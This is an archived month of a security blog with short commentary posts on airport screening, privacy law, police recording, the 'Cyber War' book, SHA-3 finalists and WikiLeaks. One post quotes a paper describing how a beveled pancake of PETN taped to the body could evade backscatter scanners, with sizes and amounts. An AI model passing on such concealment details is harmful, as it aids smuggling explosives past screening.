Blog: December 2010 Archives

Friday Squid Blogging: Research into Squid Skin

DoD awarded a $6M grant to study squid skin:

“Our internal nickname for this project is ‘squid skin,’ but it is really about fundamental research,” said Naomi Halas, a nano-optics pioneer at Rice and the principal investigator on the four-year grant. “Our deliverable is knowledge—the basic discoveries that will allow us to make materials that are observant, adaptive and responsive to their environment.”

Halas said the project was inspired by the groundbreaking work of grant co-investigator Roger Hanlon, a Woods Hole marine biologist who has spent more than three decades studying the class of animals called cephalopods that includes the squid, octopus and cuttlefish. One of Hanlon’s many discoveries is that cephalopod skins contain opsins, the same type of light-sensing proteins that function in eyes.

“The presence of opsin means they have some primitive vision sensor embedded in their skin,” Halas said. “So the questions we have are, ‘What can we, as engineers, learn from the way these animals perceive light and color? Do their brains play a part, or is this totally downloaded into the skin so it’s not using animal CPU time?”

Posted on December 31, 2010 at 4:08 PM3 Comments

TSA Inspecting Thermoses

This is new:

Adm. James Winnefeld told The Associated Press Friday that the Transportation Security Administration is “always trying to think ahead.” Winnefeld is the head of the U.S. Northern Command, which is charged with protecting the homeland.

TSA officials had said Thursday that in coming days, passengers flying within and to the U.S. may notice additional security measures related to insulated beverage containers such as thermoses.

Winnefeld says officials responsible for homeland security are always a bit more alert over the holiday season. He says there has been a lot of chatter online about potential terror activity, but nothing specific.

Posted on December 29, 2010 at 11:09 AM80 Comments

An Honest Privacy Policy

Funny:

The data we collect is strictly anonymous, unless you’ve been kind enough to give us your name, email address, or other identifying information. And even if you have been that kind, we promise we won’t sell that information to anyone else, unless of course our impossibly obtuse privacy policy says otherwise and/or we change our minds tomorrow.

There’s a lot more.

Posted on December 27, 2010 at 1:04 PM13 Comments

This Suspicious Photography Stuff Is Confusing

See:

Last week, Metro Transit Police received a report from a rider about suspicious behavior at the L’Enfant Plaza station and on an Orange Line train to Vienna.

The rider told Metro he saw two men acting suspiciously and videotaping platforms, trains and riders.

“The men, according to the citizen report, were trying to be inconspicuous, holding the cameras at their sides,” Metro spokesman Steven Taubenkibel says.

The rider was able to photograph the men who were videotaping and sent the photo to Metro Transit Police.

I assume the rider took that photo inconspicuously, too, which means that he’s now suspicious.

How will this all end?

EDITED TO ADD (12/27): In the comments I was asked about reconciling good profiling with this sort of knee-jerk photography=suspicious nonsense. It’s complicated, and I wrote about it here in 2007. This, from 2004, is also relevant.

Posted on December 27, 2010 at 6:12 AM102 Comments

PlugBot

Interesting:

PlugBot is a hardware bot. It’s a covert penetration testing device designed for use during physical penetration tests. PlugBot is a tiny computer that looks like a power adapter; this small size allows it to go physically undetected all the while powerful enough to scan, collect and deliver test results externally.

How do you use it?

Gain access to the target location (conference room?), plug the PlugBot in the nearest wall outlet and walk out. The PlugBot is configured to make an external connection (Wi-fi or Ethernet) to a specified IP address to receive instructions. Central Command allows the penetration tester to invoke scripts and applications. Output as a result of testing is encrypted and securely transmitted to the Drop Zone where data is imported into Central Command for analysis by the pen tester.

Note that it has a squid logo.

Posted on December 24, 2010 at 1:14 PM45 Comments

Proprietary Encryption in Car Immobilizers Cracked

This shouldn’t be a surprise:

Karsten Nohl’s assessment of dozens of car makes and models found weaknesses in the way immobilisers are integrated with the rest of the car’s electronics.

The immobiliser unit should be connected securely to the vehicle’s electronic engine control unit, using the car’s internal data network. But these networks often use weaker encryption than the immobiliser itself, making them easier to crack.

What’s more, one manufacturer was even found to use the vehicle ID number as the supposedly secret key for this internal network. The VIN, a unique serial number used to identify individual vehicles, is usually printed on the car. “It doesn’t get any weaker than that,” Nohl says.

Posted on December 23, 2010 at 2:02 PM32 Comments

Interview with the European Union Privacy Chief

Interesting interview with Viviane Reding, the vice president of the EU Justice Commission and head of privacy regulation:

The basic values in Europe are that we have the right to our own private, personal data. It’s mine. And if one agrees to give that data,then it is available. That is known as opt-in consent and we’ve had that as law since 1995.

[…]

Protection of individuals is not the question of voluntary action. For us, it is written in our charter of fundamental rights that everyone has the right to the protection of their data.

Differences in privacy law between the US and the EU are going to be a big issue in 2011.

Posted on December 23, 2010 at 5:59 AM22 Comments

Interview with TSA Administrator John Pistole

He’s more realistic than one normally hears:

So if they get through all those defenses, they get to Reagan [National Airport] over here, and they’ve got an underwear bomb, they got a body cavity bomb—what’s reasonable to expect TSA to do? Hopefully our behavior detection people will see somebody sweating, or they’re dancing on their shoes or something, or they’re fiddling with something. Our explosives specialists, they’ll do something – they do hand swabs at random, unpredictably. If that doesn’t work then they go through (the enhanced scanner). And these machines give the best opportunity to detect a non-metallic device, but they’re not foolproof.

[…]

We’re not in the risk elimination business. The only way you can eliminate car accidents from happening is by not driving. OK, that’s not acceptable. The only way you can eliminate the risk of planes blowing up is nobody flies.

He still ducks some of the hard questions.

I am reminded my own interview from 2007 with then-TSA Administrator Kip Hawley.

Posted on December 22, 2010 at 12:27 PM57 Comments

Adam Shostack on TSA Threat Modeling

Good commentary:

I’ve said before and I’ll say again, there are lots of possible approaches to threat modeling, and they all involve tradeoffs. I’ve commented that much of the problem is the unmeetable demands TSA labors under, and suggested fixes. If TSA is trading planned responses to Congress for effective security, I think Congress ought to be asking better questions. I’ll suggest “how do you model future threats?” as an excellent place to start.

Continuing on from there, an effective systematic approach would involve diagramming the air transport system, and ensuring that everyone and everything who gets to the plane without being authorized to be on the flight deck goes through reasonable and minimal searches under the Constitution, which are used solely for flight security. Right now, there’s discrepancies in catering and other servicing of the planes, there’s issues with cargo screening, etc.

These issues are getting exposed by the red teaming which happens, but that doesn’t lead to a systematic set of balanced defenses.

As long as the President is asking “Is this effective against the kind of threat that we saw in the Christmas Day bombing?” we’ll know that the right threat models aren’t making it to the top.

Posted on December 22, 2010 at 7:15 AM32 Comments

Recording the Police

I’ve written a lot on the “War on Photography,” where normal people are harassed as potential terrorists for taking pictures of things in public. This article is different; it’s about recording the police:

Allison’s predicament is an extreme example of a growing and disturbing trend. As citizens increase their scrutiny of law enforcement officials through technologies such as cell phones, miniature cameras, and devices that wirelessly connect to video-sharing sites such as YouTube and LiveLeak, the cops are increasingly fighting back with force and even jail time—and not just in Illinois. Police across the country are using decades-old wiretapping statutes that did not anticipate iPhones or Droids, combined with broadly written laws against obstructing or interfering with law enforcement, to arrest people who point microphones or video cameras at them. Even in the wake of gross injustices, state legislatures have largely neglected the issue. Meanwhile, technology is enabling the kind of widely distributed citizen documentation that until recently only spy novelists dreamed of. The result is a legal mess of outdated, loosely interpreted statutes and piecemeal court opinions that leave both cops and citizens unsure of when recording becomes a crime.

This is all important. Being able to record the police is one of the best ways to ensure that the police are held accountable for their actions. Privacy has to be viewed in the context of relative power. For example, the government has a lot more power than the people. So privacy for the government increases their power and increases the power imbalance between government and the people; it decreases liberty. Forced openness in government—open government laws, Freedom of Information Act filings, the recording of police officers and other government officials, WikiLeaks—reduces the power imbalance between government and the people, and increases liberty.

Privacy for the people increases their power. It also increases liberty, because it reduces the power imbalance between government and the people. Forced openness in the people—NSA monitoring of everyone’s phone calls and e-mails, the DOJ monitoring everyone’s credit card transactions, surveillance cameras—decreases liberty.

I think we need a law that explicitly makes it legal for people to record government officials when they are interacting with them in their official capacity. And this is doubly true for police officers and other law enforcement officials.

EDITED TO ADD: Anthony Graber, the Maryland motorcyclist in the article, had all the wiretapping charges cleared.

Posted on December 21, 2010 at 1:39 PM149 Comments

Book Review: Cyber War

Cyber War: The Next Threat to National Security and What to do About It by Richard Clarke and Robert Knake, HarperCollins, 2010.

Cyber War is a fast and enjoyable read. This means you could give the book to your non-techy friends, and they’d understand most of it, enjoy all of it, and learn a lot from it. Unfortunately, while there’s a lot of smart discussion and good information in the book, there’s also a lot of fear-mongering and hyperbole as well. Since there’s no easy way to tell someone what parts of the book to pay attention to and what parts to take with a grain of salt, I can’t recommend it for that purpose. This is a pity, because parts of the book really need to be widely read and discussed.

The fear-mongering and hyperbole is mostly in the beginning. There, the authors describe the cyberwar of novels. Hackers disable air traffic control, delete money from bank accounts, cause widespread blackouts, release chlorine gas from chemical plants, and—this is my favorite—remotely cause your printer to catch on fire. It’s exciting and scary stuff, but not terribly realistic. Even their discussions of previous “cyber wars”—Estonia, Georgia, attacks against U.S. and South Korea on July 4, 2009—are full of hyperbole. A lot of what they write is unproven speculation, but they don’t say that.

Better is the historical discussion of the formation of the U.S. Cyber Command, but there are important omissions. There’s nothing about the cyberwar fear being stoked that accompanied this: by the NSA’s General Keith Alexander—who became the first head of the command—or by the NSA’s former director, current military contractor, by Mike McConnell, who’s Senior Vice President at Booz Allen Hamilton, and by others. By hyping the threat, the former has amassed a lot of power, and the latter a lot of money. Cyberwar is the new cash cow of the military-industrial complex, and any political discussion of cyberwar should include this as well.

Also interesting is the discussion of the asymmetric nature of the threat. A country like the United States, which is heavily dependent on the Internet and information technology, is much more vulnerable to cyber-attacks than a less-developed country like North Korea. This means that a country like North Korea would benefit from a cyberwar exchange: they’d inflict far more damage than they’d incur. This also means that, in this hypothetical cyberwar, there would be pressure on the U.S. to move the war to another theater: air and ground, for example. Definitely worth thinking about.

Most important is the section on treaties. Clarke and Knake have a lot of experience with nuclear treaties, and have done considerable thinking about how to apply that experience to cyberspace. The parallel isn’t perfect, but there’s a lot to learn about what worked and what didn’t, and—more importantly—how things worked and didn’t. The authors discuss treaties banning cyberwar entirely (unlikely), banning attacks against civilians, limiting what is allowed in peacetime, stipulating no first use of cyber weapons, and so on. They discuss cyberwar inspections, and how these treaties might be enforced. Since cyberwar would be likely to result in a new worldwide arms race, one with a more precarious trigger than the nuclear arms race, this part should be read and discussed far and wide. Sadly, it gets lost in the rest of the book. And, since the book lacks an index, it can be hard to find any particular section after you’re done reading it.

In the last chapter, the authors lay out their agenda for the future, which largely I agree with.

  1. We need to start talking publicly about cyber war. This is certainly true. The threat of cyberwar is going to consume the sorts of resources we shoveled into the nuclear threat half a century ago, and a realistic discussion of the threats, risks, countermeasures, and policy choices is essential. We need more universities offering degrees in cyber security, because we need more expertise for the entire gamut of threats.
  2. We need to better defend our military networks, the high-level ISPs, and our national power grid. Clarke and Knake call this the “Defensive Triad.” The authors and I disagree strongly on how this should be done, but there is no doubt that it should be done. The two parts of that triad currently in commercial hands are simply too central to our nation, and too vulnerable, to be left insecure. And their value is far greater to the nation than it is to the corporations that own it, which means the market will not naturally secure it. I agree with the authors that regulation is necessary.
  3. We need to reduce cybercrime. Even without the cyber warriors bit, we need to do that. Cybercrime is bad, and it’s continuing to get worse. Yes, it’s hard. But it’s important.
  4. We need international cyberwar treaties. I couldn’t agree more about this. We do. We need to start thinking about them, talking about them, and negotiating them now, before the cyberwar arms race takes off. There are all kind of issues with cyberwar treaties, and the book talks about a lot of them. However full of loopholes they might be, their existence will do more good than harm.
  5. We need more research on secure network designs. Again, even without the cyberwar bit, this is essential. We need more research in cybersecurity, a lot more.
  6. We need decisions about cyberwar—what weapons to build, what offensive actions to take, who to target—to be made as far up the command structure as possible. Clarke and Knake want the president to personally approve all of this, and I agree. Because of its nature, it can be easy to launch a small-scale cyber attack, and it can be easy for a small-scale attack to get out of hand and turn into a large-scale attack. We need the president to make the decisions, not some low-level military officer ensconced in a computer-filled bunker late one night.

This is great stuff, and a fine starting place for a national policy discussion on cybersecurity, whether it be against a military, espionage, or criminal threat. Unfortunately, for readers to get there, they have to wade through the rest of the book. And unless their bullshit detectors are already well-calibrated on this topic, I don’t want them reading all the hyperbole and fear-mongering that comes before, no matter how readable the book.

Note: I read Cyber War in April, when it first came out. I wanted to write a review then, but found that while my Kindle is great for reading, it’s terrible for flipping back and forth looking for bits and pieces to write about in a review. So I let the review languish. Finally, I borrowed a paper copy from my local library.

Some other reviews of the book Cyber War. See also the reviews on the Amazon page.

I wrote two essays on cyberwar.

Posted on December 21, 2010 at 7:23 AM32 Comments

Computational Forensics

Interesting article from IEEE Spectrum:

During two years of deliberation by the National Academy’s forensic science committee (of which I was a member), a troubling picture emerged. A large part of current forensics practice is skill and art rather than science, and the influences present in a typical law-enforcement setting are not conducive to doing the best science. Also, many of the methods have never been scientifically validated. And the wide variation in forensic data often makes interpretation exceedingly difficult.

[…]

So how might greater automation of classical forensics techniques help? New algorithms and software could improve things in a number of ways. One important area is to quantify the chance that the evidence is unique by applying various probability models.

[…]

Computational forensics can also be used to narrow down the range of possible matches against a database of cataloged patterns. To do that, you need a way to quantify the similarity between the query and each entry in the database. These similarity values are then used to rank the database entries and retrieve the closest ones for further comparison. Of course, the process becomes more complicated when the database contains millions or even hundreds of millions of entries. But then, computers are much better suited than people to such tedious and repetitive search tasks.

Posted on December 20, 2010 at 11:48 AM17 Comments

"Architecture of Fear"

I like the phrase:

Németh said the zones not only affect the appearance of landmark buildings but also reflect an ‘architecture of fear’ as evidenced, for example, by the bunker-like appearance of embassies and other perceived targets.

Ultimately, he said, these places impart a dual message—simultaneously reassuring the public while causing a sense of unease.

And in the end, their effect could be negligible.

“Indeed, overt security measures may be no more effective than covert intelligence techniques,” he said. “But the architecture aims to comfort both property developers concerned with investment risk and residents and tourists with the notion that terror threats are being addressed and that daily life will soon ‘return to normal.'”

My own essay on architecture and security from 2006.

EDITED TO ADD (1/13): Here’s the full paper. And some stuff from the Whole Building Design Guide site. Also see the planned U.S. embassy in London, which includes a moat.

Posted on December 20, 2010 at 5:55 AM32 Comments

Friday Squid Blogging: Prosthetic Tentacle

Impressive:

Designed for a class project while getting her degree at the Industrial Design Department at the University of Washington, Kaylene Kau has not only exploded perceptions of how prosthetic arms should look, but sent an entire subset of Japanese Hentai fans to their feet, cheering her on. If that’s not worth an employer’s attention, I don’t know what is. Good luck designing the future, Kaylene!

Posted on December 17, 2010 at 4:48 PM12 Comments

Hiding PETN from Full-Body Scanners

From the Journal of Transporation Security, “An evaluation of airport x-ray backscatter units based on image characteristics,” by Leon Kaufman and Joseph W. Carlson:

Abstract:

Little information exists on the performance of x-ray backscatter machines now being deployed through UK, US and other airports. We implement a Monte Carlo simulation using as input what is known about the x-ray spectra used for imaging, device specifications and available images to estimate penetration and exposure to the body from the x-ray beam, and sensitivity to dangerous contraband materials. We show that the body is exposed throughout to the incident x-rays, and that although images can be made at the exposure levels claimed (under 100 nanoGrey per view), detection of contraband can be foiled in these systems. Because front and back views are obtained, low Z materials can only be reliable detected if they are packed outside the sides of the body or with hard edges, while high Z materials are well seen when placed in front or back of the body, but not to the sides. Even if exposure were to be increased significantly, normal anatomy would make a dangerous amount of plastic explosive with tapered edges difficult if not impossible to detect.

From the paper:

It is very likely that a large (15-20 cm in diameter), irregularly-shaped, cm-thick pancake with beveled edges, taped to the abdomen, would be invisible to this technology, ironically, because of its large volume, since it is easily confused with normal anatomy. Thus, a third of a kilo of PETN, easily picked up in a competent pat down, would be missed by backscatter “high technology”. Forty grams of PETN, a purportedly dangerous amount, would fit in a 1.25 mm-thick pancake of the dimensions simulated here and be virtually invisible. Packed in a compact mode, say, a 1 cm×4 cm×5 cm brick, it would be detected.

EDITED TO ADD (1/12): Stephen Colbert on the issue.

Posted on December 17, 2010 at 2:13 PM55 Comments

Did the FBI Plant Backdoors in OpenBSD?

It has been accused of it.

I doubt this is true. One, it’s a very risky thing to do. And two, there are more than enough exploitable security vulnerabilities in a piece of code that large. Finding and exploiting them is a much better strategy than planting them. But maybe someone at the FBI is that dumb.

EDITED TO ADD (12/17): Further information is here. And a denial from an FBI agent.

Posted on December 17, 2010 at 10:49 AM72 Comments

Fake Amazon Receipt Generators

They can be used to scam Amazon Marketplace merchants:

What happens once our scammer is armed with his fake receipt? Well, many sellers on Amazon will ask you to send them a copy of your receipt should you run into trouble, have orders go missing, lose your license key for a piece of software and so on. The gag here is that the scammer is relying on the seller not checking the details and accepting the printout at face value. After all, how many sellers would be aware somebody went to the trouble of creating a fake receipt generator in the first place?

They’re also useful if you want to defraud your employer on expense reimbursement forms.

Posted on December 17, 2010 at 6:28 AM20 Comments

Security in 2020

There’s really no such thing as security in the abstract. Security can only be defined in relation to something else. You’re secure from something or against something. In the next 10 years, the traditional definition of IT security—­that it protects you from hackers, criminals, and other bad guys—­will undergo a radical shift. Instead of protecting you from the bad guys, it will increasingly protect businesses and their business models from you.

Ten years ago, the big conceptual change in IT security was deperimeterization. A wordlike grouping of 18 letters with both a prefix and a suffix, it has to be the ugliest word our industry invented. The concept, though—­the dissolution of the strict boundaries between the internal and external network—­was both real and important.

There’s more deperimeterization today than there ever was. Customer and partner access, guest access, outsourced e-mail, VPNs; to the extent there is an organizational network boundary, it’s so full of holes that it’s sometimes easier to pretend it isn’t there. The most important change, though, is conceptual. We used to think of a network as a fortress, with the good guys on the inside and the bad guys on the outside, and walls and gates and guards to ensure that only the good guys got inside. Modern networks are more like cities, dynamic and complex entities with many different boundaries within them. The access, authorization, and trust relationships are even more complicated.

Today, two other conceptual changes matter. The first is consumerization. Another ponderous invented word, it’s the idea that consumers get the cool new gadgets first, and demand to do their work on them. Employees already have their laptops configured just the way they like them, and they don’t want another one just for getting through the corporate VPN. They’re already reading their mail on their BlackBerrys or iPads. They already have a home computer, and it’s cooler than the standard issue IT department machine. Network administrators are increasingly losing control over clients.

This trend will only increase. Consumer devices will become trendier, cheaper, and more integrated; and younger people are already used to using their own stuff on their school networks. It’s a recapitulation of the PC revolution. The centralized computer center concept was shaken by people buying PCs to run VisiCalc; now it’s iPads and Android smart phones.

The second conceptual change comes from cloud computing: our increasing tendency to store our data elsewhere. Call it decentralization: our email, photos, books, music, and documents are stored somewhere, and accessible to us through our consumer devices. The younger you are, the more you expect to get your digital stuff on the closest screen available. This is an important trend, because it signals the end of the hardware and operating system battles we’ve all lived with. Windows vs. Mac doesn’t matter when all you need is a web browser. Computers become temporary; user backup becomes irrelevant. It’s all out there somewhere—­and users are increasingly losing control over their data.

During the next 10 years, three new conceptual changes will emerge, two of which we can already see the beginnings of. The first I’ll call deconcentration. The general-purpose computer is dying and being replaced by special-purpose devices. Some of them, like the iPhone, seem general purpose but are strictly controlled by their providers. Others, like Internet-enabled game machines or digital cameras, are truly special purpose. In 10 years, most computers will be small, specialized, and ubiquitous.

Even on what are ostensibly general-purpose devices, we’re seeing more special-purpose applications. Sure, you could use the iPhone’s web browser to access the New York Times website, but it’s much easier to use the NYT’s special iPhone app. As computers become smaller and cheaper, this trend will only continue. It’ll be easier to use special-purpose hardware and software. And companies, wanting more control over their users’ experience, will push this trend.

The second is decustomerization—­now I get to invent the really ugly words­—the idea that we get more of our IT functionality without any business relation­ship. We’re all part of this trend: every search engine gives away its services in exchange for the ability to advertise. It’s not just Google and Bing; most webmail and social networking sites offer free basic service in exchange for advertising, possibly with premium services for money. Most websites, even useful ones that take the place of client software, are free; they are either run altruistically or to facilitate advertising.

Soon it will be hardware. In 1999, Internet startup FreePC tried to make money by giving away computers in exchange for the ability to monitor users’ surfing and purchasing habits. The company failed, but computers have only gotten cheaper since then. It won’t be long before giving away netbooks in exchange for advertising will be a viable business. Or giving away digital cameras. Already there are companies that give away long-distance minutes in exchange for advertising. Free cell phones aren’t far off. Of course, not all IT hardware will be free. Some of the new cool hardware will cost too much to be free, and there will always be a need for concentrated computing power close to the user­—game systems are an obvious example—­but those will be the exception. Where the hardware costs too much to just give away, however, we’ll see free or highly subsidized hardware in exchange for locked-in service; that’s already the way cell phones are sold.

This is important because it destroys what’s left of the normal business rela­tionship between IT companies and their users. We’re not Google’s customers; we’re Google’s product that they sell to their customers. It’s a three-way relation­ship: us, the IT service provider, and the advertiser or data buyer. And as these noncustomer IT relationships proliferate, we’ll see more IT companies treating us as products. If I buy a Dell computer, then I’m obviously a Dell customer; but if I get a Dell computer for free in exchange for access to my life, it’s much less obvious whom I’m entering a business relationship with. Facebook’s continual ratcheting down of user privacy in order to satisfy its actual customers­—the advertisers—and enhance its revenue is just a hint of what’s to come.

The third conceptual change I’ve termed depersonization: computing that removes the user, either partially or entirely. Expect to see more software agents: programs that do things on your behalf, such as prioritize your email based on your observed preferences or send you personalized sales announcements based on your past behavior. The “people who liked this also liked” feature on many retail websites is just the beginning. A website that alerts you if a plane ticket to your favorite destination drops below a certain price is simplistic but useful, and some sites already offer this functionality. Ten years won’t be enough time to solve the serious artificial intelligence problems required to fully real­ize intelligent agents, but the agents of that time will be both sophisticated and commonplace, and they’ll need less direct input from you.

Similarly, connecting objects to the Internet will soon be cheap enough to be viable. There’s already considerable research into Internet-enabled medical devices, smart power grids that communicate with smart phones, and networked automobiles. Nike sneakers can already communicate with your iPhone. Your phone already tells the network where you are. Internet-enabled appliances are already in limited use, but soon they will be the norm. Businesses will acquire smart HVAC units, smart elevators, and smart inventory systems. And, as short-range communications­—like RFID and Bluetooth—become cheaper, everything becomes smart.

The “Internet of things” won’t need you to communicate. The smart appliances in your smart home will talk directly to the power company. Your smart car will talk to road sensors and, eventually, other cars. Your clothes will talk to your dry cleaner. Your phone will talk to vending machines; they already do in some countries. The ramifications of this are hard to imagine; it’s likely to be weirder and less orderly than the contemporary press describes it. But certainly smart objects will be talking about you, and you probably won’t have much control over what they’re saying.

One old trend: deperimeterization. Two current trends: consumerization and decentralization. Three future trends: deconcentration, decustomerization, and depersonization. That’s IT in 2020—­it’s not under your control, it’s doing things without your knowledge and consent, and it’s not necessarily acting in your best interests. And this is how things will be when they’re working as they’re intended to work; I haven’t even started talking about the bad guys yet.

That’s because IT security in 2020 will be less about protecting you from traditional bad guys, and more about protecting corporate business models from you. Deperimeterization assumes everyone is untrusted until proven otherwise. Consumerization requires networks to assume all user devices are untrustworthy until proven otherwise. Decentralization and deconcentration won’t work if you’re able to hack the devices to run unauthorized software or access unauthorized data. Deconsumerization won’t be viable unless you’re unable to bypass the ads, or whatever the vendor uses to monetize you. And depersonization requires the autonomous devices to be, well, autonomous.

In 2020—­10 years from now­—Moore’s Law predicts that computers will be 100 times more powerful. That’ll change things in ways we can’t know, but we do know that human nature never changes. Cory Doctorow rightly pointed out that all complex ecosystems have parasites. Society’s traditional parasites are criminals, but a broader definition makes more sense here. As we users lose control of those systems and IT providers gain control for their own purposes, the definition of “parasite” will shift. Whether they’re criminals trying to drain your bank account, movie watchers trying to bypass whatever copy protection studios are using to protect their profits, or Facebook users trying to use the service without giving up their privacy or being forced to watch ads, parasites will continue to try to take advantage of IT systems. They’ll exist, just as they always have existed, and­ like today­ security is going to have a hard time keeping up with them.

Welcome to the future. Companies will use technical security measures, backed up by legal security measures, to protect their business models. And unless you’re a model user, the parasite will be you.

This essay was originally written as a foreword to Security 2020, by Doug Howard and Kevin Prince.

Posted on December 16, 2010 at 6:27 AM82 Comments

Realistic Masks

They’re causing problems:

A white bank robber in Ohio recently used a “hyper-realistic” mask manufactured by a small Van Nuys company to disguise himself as a black man, prompting police there to mistakenly arrest an African American man for the crimes.

In October, a 20-year-old Chinese man who wanted asylum in Canada used one of the same company’s masks to transform himself into an elderly white man and slip past airport security in Hong Kong.

Authorities are even starting to think that the so-called Geezer Bandit, a Southern California bank robber believed for months to be an old man, might actually be a younger guy wearing one of the disguises made by SPFXMasks.

News coverage of the incidents has pumped up demand for the masks, which run from $600 to $1,200, according to company owner Rusty Slusser. But he says he’s not happy about it.

[…]

Slusser opened SPFXMasks in 2003. His six-person crew uses silicone that looks and feels like flesh, down to the pores. Each strand of hair ­ and it’s human hair ­ is sewn on individually. Artists methodically paint the masks to create realistic skin tones.

“I wanted to make something that looks so real that when you go out for Halloween no one can tell,” Slusser said. “It’s like ‘Mission: Impossible’ ­ you pull it over your head one time and that’s it. It’s like a 10-hour makeup job in 10 seconds.”

He experimented until he found the right recipe for silicone that would seem like skin. A key discovery was that if the inside of the mask is smooth ­ even if the outside is bumpy with pores, a nose and other features ­ it will stretch over most faces and move with facial muscles.

Posted on December 14, 2010 at 1:12 PM57 Comments

Sometimes CCTV Cameras Work

Sex attack caught on camera.

Hamilton police have arrested two men after a sex attack on a woman early today was caught on the city’s closed circuit television (CCTV) cameras.

CCTV operators contacted police when they became concerned about the safety of a woman outside an apartment block near the intersection of Victoria and Collingwood streets about 5am today.

Remember, though, that the test for whether the surveillance cameras are worth it is whether or not this crime would have been solved without them. That is, were the cameras necessary for arrest or conviction?

My previous writing on cameras.

EDITED TO ADD (12/17): When I wrote “remember, though, that the test for whether the surveillance cameras are worth it is whether or not this crime would have been solved without them,” I was being sloppy. That’s the test as to whether or not they had any value in this case.

Posted on December 13, 2010 at 2:01 PM50 Comments

CRB Check Backlash

Against stupid CRB checks:

Last January, Annabel Hayter, chairwoman of Gloucester Cathedral Flower Guild, received an email saying that she and her 60 fellow flower arrangers would have to undergo a CRB check. CRB stands for Criminal Records Bureau, and a CRB check is a time-consuming, sometimes expensive, pretty much always pointless vetting procedure that you must go through if you work with children or “vulnerable adults.” Everybody else had been checked: the “welcomers” at the cathedral door; the cathedral guides; the whole of the cathedral office (though they rarely left their room). The flower guild was all that remained.

The cathedral authorities expected no resistance. Though the increasing demand for ever tighter safety regulation has become one of the biggest blights on Britain today, we are all strangely supine: frightened not to comply. Not so Annabel Hayter. “I am not going to do it,” she said. And her act of rebellion sparked a mini-revolution among the other cathedral flower ladies. In total she received 30 letters from guild members who judged vetting to be either an invasion of privacy (which it certainly is) insecure (the CRB has a frightening tendency to return the wrong results) or unnecessary (they are the least likely paedophiles in the country). Several threatened to resign if forced to undergo it. Thus began the battle of Gloucester Cathedral, between the dean and the flower guild, a battle which is just reaching its final stage as The Spectator goes to press. First the guild asked why the checks were necessary. The answer turned out to be that the flower arrangers shared a toilet with the choirboys, and without checks there would be “paedophiles infiltrating the flower guild.”

I wrote about CRB checks in 2008.

Posted on December 13, 2010 at 6:42 AM60 Comments

NIST Announces SHA-3 Finalists (Skein is One of Them)

Yesterday, NIST announced the five hash functions to advance to the third (and final) round in the SHA-3 selection process: BLAKE, Grøstl, JH, Keccak, and Skein. Not really a surprise; my predictions—which I did not publish—listed ECHO instead of JH, but correctly identified the other four. (Most of the predictions I saw guessed BLAKE, Grøstl, Keccak, and Skein, but differed on the fifth.)

NIST will publish a report that explains its rationale for selecting the five it did.

Next is the Third SHA-3 Candidate Conference, which will probably be held in March 2012 in Washington, DC, in conjunction with FSE 2012. NIST will then pick a single algorithm to become SHA-3.

More information about Skein and the SHA-3 selection process, including lots of links, is here. Version 1.3 of the Skein paper, which discusses the new constant to defeat the Khovratovich-Nikolié-Rechberger attack, is here (description of the tweak here). And there’s this new analysis of Skein.

And if you ordered a Skein polo shirt in September, they’ve been shipped.

Posted on December 10, 2010 at 12:04 PM31 Comments

Alternate Scanning Technologies

Iscon uses infrared light rather than X-rays. I have no idea how well it works.

And Rapiscan has a new patent:

Abstract:

The present invention is directed towards an X-ray people screening system capable of rapidly screening people for detection of metals, low Z materials (plastics, ceramics and illicit drugs) and other contraband which might be concealed beneath the person’s clothing or on the person’s body. In an exemplary embodiment, the scanning system has two scanning modules that are placed in parallel, yet opposing positions relative to each other. The two modules are spaced to allow a subject, such as a person, to stand and pass between the two scanning modules. The first module and second module each include a radiation source (such as X-ray radiation) and a detector array. The subject under inspection stands between the two modules such that a front side of the subject faces one module and the back side of the subject faces the other module.

Posted on December 10, 2010 at 6:22 AM39 Comments

WikiLeaks

I don’t have a lot to say about WikiLeaks, but I do want to make a few points.

1. Encryption isn’t the issue here. Of course the cables were encrypted, for transmission. Then they were received and decrypted, and—so it seems—put into an archive on SIPRNet, where lots of people had access to them in their unencrypted form.

2. Secrets are only as secure as the least trusted person who knows them. The more people who know a secret, the more likely it is to be made public.

3. I’m not surprised these cables were available to so many people. We know access control is hard, and it’s impossible to know beforehand what information people will need to do their jobs. What is surprising is that there weren’t any audit logs kept about who accessed all these cables. That seems like a no-brainer.

4. This has little to do with WikiLeaks. WikiLeaks is just a website. The real story is that “least trusted person” who decided to violate his security clearance and make these cables public. In the 1970s, he would have mailed them to a newspaper. Today, he used WikiLeaks. Tomorrow, he will have his choice of a dozen similar websites. If WikiLeaks didn’t exist, he could have made them available via BitTorrent.

5. I think the government is learning what the music and movie industries were forced to learn years ago: it’s easy to copy and distribute digital files. That’s what’s different between the 1970s and today. Amassing and releasing that many documents was hard in the paper and photocopier era; it’s trivial in the Internet era. And just as the music and movie industries are going to have to change their business models for the Internet era, governments are going to have to change their secrecy models. I don’t know what those new models will be, but they will be different.

EDITED TO ADD (12/10): Me in The Economist:

The State Department has learned what the music and film industries learned long ago: that digital files are easy to copy and distribute, says Bruce Schneier, a security expert. Companies are about to make that discovery, too. There will be more leaks, and they will be embarrassing.

Posted on December 9, 2010 at 5:50 AM115 Comments

Never Let the Terrorists Know How We're Storing Road Salt

This seems not to be a joke:

The American Civil Liberties Union has filed a lawsuit against the state after it refused to release the construction plans for a barn used to store road salt, on the basis that doing so would be a security risk.

[…]

Chiaffarano filed an OPRA request for the state’s building plans, but was denied her request as the state cited a 2002 executive order by Gov. James McGreevey.

The order, issued in the wake of the Sept. 11 terrorist attacks on the World Trade Center and the Pentagon, allows the state to decline the release of public records that would compromise the state’s ability to “protect and defend the state and its citizens against acts of sabotage or terrorism.”

Lisa Ryan, spokeswoman for the Department of Community Affairs, declined to comment on the pending lawsuit.

Posted on December 8, 2010 at 2:27 PM67 Comments

Sane Comments on Terrorism

From Michael Leiter, the director of the National Counterterrorism Center:

Ultimately, Leiter said, it’ll be the “quiet, confident resilience” of Americans after a terrorist attack that will “illustrate ultimately the futility of terrorism.” That doesn’t mean not to hit back: Leiter quickly added that “we will hold those accountable [and] we will be ready to respond to those attacks.” But it does mean recognizing, he said, that “we help define the success of an attack by our reaction to that attack.”

Sure, I’ve been saying this since forever. But I think this is the most senior government person who has said this.

EDITED TO ADD (12/8): There are enough essays with this sentiment that I’m going to stop blogging about it. Here’s what I have saved up.

Roger Cohen, “The Real Threat to America“:

So I give thanks this week for the Fourth Amendment: “The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no Warrants shall issue, but upon probable cause, supported by Oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized.”

